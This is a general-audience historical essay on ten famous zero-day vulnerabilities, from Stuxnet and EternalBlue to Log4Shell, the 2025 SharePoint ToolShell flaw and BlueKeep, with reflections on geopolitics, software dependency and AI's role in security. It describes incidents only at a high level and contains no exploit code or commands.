The 10 Zero-Days That Made History:
Chronicle of a World Where the Invisible Becomes a Weapon

Computer vulnerabilities are countless. But some, due to their scale and consequences, permanently reshape the way we think about cybersecurity. Zero-days are among them. These flaws—exploited before a patch is even available—have a unique character: they serve as a stark reminder that security is always built on a temporary illusion. In recent years, countless examples have shown how these invisible cracks have turned into powerful levers of economic, political, and technological disruption.

A zero-day is a vulnerability that is still unknown to its vendor – or one for which no security patch exists at the time it is discovered or exploited. The term “zero-day” refers to the novelty of the flaw: at “day zero,” the vulnerability is still unknown to everyone. And, in a somewhat ironic twist, the very day it is discovered or exploited, there are… “zero days” left to react.

From a technical standpoint, zero-days often stem from programming errors: memory overflows, missing input validation, or poor cryptographic practices. But the reality goes beyond technicalities. A zero-day is not just a faulty line of code – it is the embodiment of the fragility of a hyperconnected world, where a tiny flaw can trigger global repercussions.

Most discovered vulnerabilities are patched before being widely exploited. But some stand out because they combine three key elements:

> Innovation in the attack: a new method or an unprecedented attack surface.
> Scale of propagation: a domino effect on a global level.
> Economic, political, or societal consequences: beyond the code itself, it is trust in the digital world that begins to falter.

1. Stuxnet (2010). When Code Becomes a Weapon 

In 2010, Iranian centrifuges suddenly malfunctioned. The cause was neither mechanical nor human: it was Stuxnet, a computer worm designed to sabotage Siemens PLCs, which infiltrated systems through several Windows zero-days, including the LNK vulnerability.

For the first time, at such a global scale, software caused measurable physical damage. This was a turning point: computing had stepped out of the virtual world and into geopolitics. Could a nuclear plant still be considered just a “technical infrastructure” when invisible code could alter its functioning? After Stuxnet, critical industrial infrastructures—energy, transportation, water—could no longer be perceived as untouchable. The international community had to integrate cybersecurity into national defense doctrines.

 2. EternalBlue (2017). The Weapon That Escaped

Discovered by the NSA, EternalBlue targeted the Windows SMB protocol. Kept secret, it was stolen by the Shadow Brokers group and then used in the WannaCry and NotPetya attacks. The result: paralyzed hospitals, shut down multinationals, and billions in damages.

The lesson: when a state hoards a critical vulnerability, it risks having it turned against everyone. EternalBlue triggered a global reckoning on how intelligence agencies handle “stockpiled” vulnerabilities, accelerating debates around responsible disclosure and the need for states to cooperate rather than retain these digital weapons.

3. Heartbleed (2014). When the Internet Lost Trust 

Though not a strict zero-day, Heartbleed had a similar impact. A simple bug in OpenSSL-used by two-thirds of the web-allowed attackers to read server memory. Private keys, sensitive data- everything was exposed.

The incident shed light on a troubling reality: the Internet’s infrastructure often relies on open-source components maintained by very few individuals. In response, several funding and auditing initiatives for critical open-source projects were launched, such as the Core Infrastructure Initiative.

4. Shellshock (2014). The Ghost of Old Code 

Bash, the Unix/Linux command shell, was over 20 years old when a critical flaw was discovered. Exploitable with just a few lines of code, it enabled remote execution of arbitrary commands.

Millions of servers and IoT devices were compromised.

Shellshock was a stark reminder: technical legacy is a liability. The older code gets, the more it becomes a potential minefield.

5. Pegasus (2016–2021). Espionage in the Smartphone Era 

Developed by NSO Group, Pegasus exploited iOS and Android zero-days to remotely infect smartphones—first via malicious links, later with zero-click exploits. Journalists, diplomats, politicians, activists: thousands were targeted. Beyond the technical prowess, Pegasus transformed perceptions of cybersurveillance by proving that digital espionage power was no longer exclusive to states—it could be industrialized by private actors.

The scandal sparked parliamentary inquiries, diplomatic tensions, and revived the debate on international regulation of cyberweapons.

Paradoxically, while NSO Group was weakened by sanctions and blacklisting, Pegasus also showcased the military effectiveness and economic appeal of this shadowy market, where zero-days become both weapons of power and lucrative commodities.

6. Log4Shell (2021). The Ubiquitous Flaw

Discovered in late 2021, CVE-2021-44228—better known as Log4Shell—affected Log4j, a Java library used to manage application logs. Free and open-source, it was embedded in countless pieces of software—from cloud apps to enterprise services, even IoT devices. The exploit was deceptively simple: by sending a specially crafted request with a JNDI lookup, the vulnerable application would fetch and execute remote code. In practice, attackers could fully take over affected systems without authentication.

Within hours, cybercriminals weaponized it to:

• deploy ransomware in enterprise networks,
• install cryptominers on vulnerable servers,
• launch espionage campaigns.

Log4Shell brutally exposed the problem of software dependency. Millions of products embedded Log4j without their users—and sometimes even their developers—being aware of it.

The result: mass patching that was extremely complex, and in some cases impossible for certain embedded systems. This episode acted as a catalyst for initiatives such as the Software Bill of Materials (SBOM), aimed at mapping all software components used in a product to better anticipate such crises. It also highlights another facet of the digital world: interdependence. An invisible library to the end user can shake the entire ecosystem. How can we secure a world where every piece of software rests on an almost infinite chain of dependencies?

7. Chrome Zero-day (2021–2022). When the Browser Becomes the Target  

For years, Chrome has been a frequent target of actively exploited zero-days, especially in its V8 JavaScript engine. In fact, back in 2014, Google launched Project Zero—its elite security research team—to find and patch such flaws. In 2021/2022, several of these vulnerabilities allowed remote code execution in espionage campaigns against journalists and political dissidents.

The impact: even a seemingly mundane tool—the widely used web browser—proved to be a strategic weapon. Google rushed emergency patches and expanded automatic updates to minimize exposure.
The threat remains constant: as recently as 2025, several critical zero-days (CVE-2025-5419, CVE-2025-6554, CVE-2025-6558) were discovered and exploited, proving that browsers are still prime targets. Browsing, it turns out, means exposing yourself.

8. SharePoint (2025). When Collaboration Becomes the Entry Point 

In July 2025, a critical vulnerability in Microsoft SharePoint (CVE-2025-53770, dubbed ToolShell) was exploited by attackers to access files and integrated services such as Teams and OneDrive. Over 75 servers were compromised—including within U.S. public administrations—before an emergency patch was issued.

The lesson: collaboration platforms – the backbone of hybrid work – are now strategic targets. Their compromise is not limited to isolated data theft but can open transversal access across an organization’s entire digital ecosystem (email, cloud storage, internal communications). The 2025 SharePoint incident confirmed that the attack surface is expanding with digital transformation, and that collaboration tools – often seen as productivity enablers – can become systemic entry points for espionage or sabotage.

9. PrintNightmare (2021). Quand l’imprimante devient cheval de Troie 

A vulnerability in the Windows printing service allowed remote code execution and rapid propagation within enterprises.
The symbolism was striking: a service perceived as trivial ended up threatening entire systems. It was a reminder that cybersecurity is not only about the most complex layers but also about everyday functionalities.

In 2021, a critical vulnerability in the Windows Print Spooler service—used to manage printing across all Windows systems—was accidentally made public along with a working exploit. Dubbed PrintNightmare, this flaw enabled not only remote code execution but also privilege escalation, giving an attacker the ability to take full control of a machine.

The danger lay in the fact that the printing service is enabled by default in most Windows environments, both personal and professional. In an enterprise network, a single compromised workstation was enough to propagate the attack across the entire Active Directory domain by installing malicious drivers on other machines.

Consequences: PrintNightmare highlighted two key realities. First, that seemingly secondary services (like printing) can in fact be critical entry points because they are ubiquitous and rarely monitored. Second, that the premature disclosure of technical details without an available patch can significantly amplify risks. This episode pushed Microsoft and many organizations to restrict by default the privileges granted to so-called “trivial” services, reinforcing the importance of the principle of least privilege across every functional layer of a system.

10. BlueKeep (2019). The Flaw That Made the World Tremble 

Discovered in May 2019, BlueKeep (CVE-2019-0708) targeted the Remote Desktop Protocol (RDP) used to access Windows machines remotely. The vulnerability enabled unauthenticated remote code execution, with worm-like propagation comparable to WannaCry.

Its severity lay in its reach: millions of machines worldwide were affected, including outdated systems like Windows XP and Server 2003, still heavily used in hospitals, government agencies, and industry.

Faced with the risk of a new digital pandemic, Microsoft issued an extraordinary patch – even for unsupported versions. Though the flaw was exploited only on a limited scale, it created widespread panic. BlueKeep reminded the world that some vulnerabilities are so critical they can trigger global mobilization (NSA, NCSC, CISA, etc.) before they even evolve into full-blown catastrophes.

Taken together, these ten episodes highlight several key lessons:

• Cybersecurity is systemic: a single weak link can bring down the entire chain.
• It is geopolitical: vulnerabilities become tools of power and surveillance.
• It is also philosophical: each flaw questions our relationship with trust, technological dependence, and privacy.

Ultimately, a zero-day is not just a bug. It is a revealer: a revealer of our vulnerabilities, but also of our ability to respond collectively.

These ten zero-days are not just technical stories. They tell the tale of a digital world that, as it grows in power, also grows in fragility. Each flaw is a call for humility: no technology is infallible, no infrastructure untouchable.

The question remains: should we fear these vulnerabilities, or see them as necessary reminders? Probably both. Because while they expose our weaknesses, they also force us to move forward – to invent new defenses, and to strengthen our collective vigilance.

Yet a new era is already emerging – one where artificial intelligence could both accelerate the discovery of zero-days and their exploitation. Algorithms capable of analyzing billions of lines of code or automatically generating attack scenarios will change the scale of the problem. Zero-days could become more frequent, more sophisticated, and spread faster than ever. Cybersecurity will then have to rely on AI as well – to detect, anticipate, and neutralize these threats.

In the end, zero-days are the mirror of our time: an era where digital technology is vital, where AI opens new possibilities, but where security will always remain a permanent work in progress.